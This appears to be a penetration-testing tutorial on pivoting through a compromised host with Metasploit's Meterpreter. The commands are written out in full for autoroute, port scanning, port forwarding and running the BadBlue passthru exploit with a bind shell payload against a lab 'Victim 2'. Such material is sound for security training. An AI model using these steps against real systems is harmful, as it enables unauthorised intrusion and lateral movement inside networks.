Pivoting Overview

Pivoting

• Pivoting is a post exploitation technique that involves utilizing a compromised host that is connected to multiple networks to gain access to systems within other networks.

• After gaining access to one host, we can use the compromised host to exploit other hosts on a private internal network to which we could not access previously.

• Meterpreter provides us with the ability to add a network route to the internal network’s subnet, perform port forwarding and consequently scan and exploit other systems on the network.

Port Forwarding

• Port forwarding is the process of redirecting traffic from a specific port on a target system to a specific port on our system.

• In the context of pivoting, we can forward a remote port on a previously inaccessible host to a local port on our Kali Linux system so that we can remotely interact/exploit the service running on the port.

To understand pivoting, let's consider a scenario where there are two target systems: Victim 1 (10.0.29.148) and Victim 2 (10.0.29.96). From our attacking machine, we can only communicate with Victim 1, and Victim 1 can communicate with Victim 2. In this case, we need to compromise Victim 1 and then use port forwarding to attack Victim 2.

Pivoting from Victim 1 to Victim 2 Using Meterpreter

1. Set Up Communication Channel:

   On the meterpreter shell obtained on Victim 1 (10.0.29.148), set up a communication channel to the subnet that includes Victim 2 (10.0.29.96):

   Copy

   run autoroute -s 10.0.29.0/20

   View the latest routing table to confirm:

   Copy

   run autoroute -p

2. Use Metasploit's Port Scanner:

   Since Nmap cannot directly reach Victim 2, use Metasploit's port scanner. Load the TCP port scanner module and set the RHOST to Victim 2:

   Copy

   use auxiliary/scanner/portscan/tcp
   set RHOSTS 10.0.29.96
   run

3. Port Forwarding for Nmap Scan:

   To scan services on Victim 2 using Nmap, set up port forwarding. Forward the service running on Victim 2's port 80 to your attacking machine's port 1234:

   Copy

   portfwd add -l 1234 -p 80 -r 10.0.29.96

   Now, run an Nmap scan on your local machine:

   Copy

   nmap -sV -p 1234 localhost

   This will show the services running on Victim 2 (10.0.29.96) on port 80.

4. Exploit the Vulnerability:

   Having detected a vulnerability in BadBlue on Victim 2 (10.0.29.96) on port 80, use the appropriate Metasploit module to exploit it:

   Copy

   use exploit/windows/http/badblue_passthru
   set payload windows/meterpreter/bind_tcp
   set RHOSTS 10.0.29.96
   run

This will grant you access to Victim 2 (10.0.29.96) through a meterpreter shell.

Meterpreter Commands:

• run autoroute -s 10.0.29.0/20 – Add a route for the subnet 10.0.29.0/20.

• run autoroute -p – Show the current routing table.

• portfwd add -l 1234 -p 80 -r 10.0.29.96 – Forward traffic from local port 1234 to remote IP 10.0.29.96 on port 80.

Metasploit Modules:

• /auxiliary/scanner/portscan/tcp – A Metasploit auxiliary module for performing TCP port scans.

• /exploit/windows/http/badblue_passthru – A Metasploit module for exploiting vulnerabilities in the BadBlue web server to achieve remote code execution.

Hacker's Mantra:In a world of zeros and ones, hackers are the ones who give it meaning.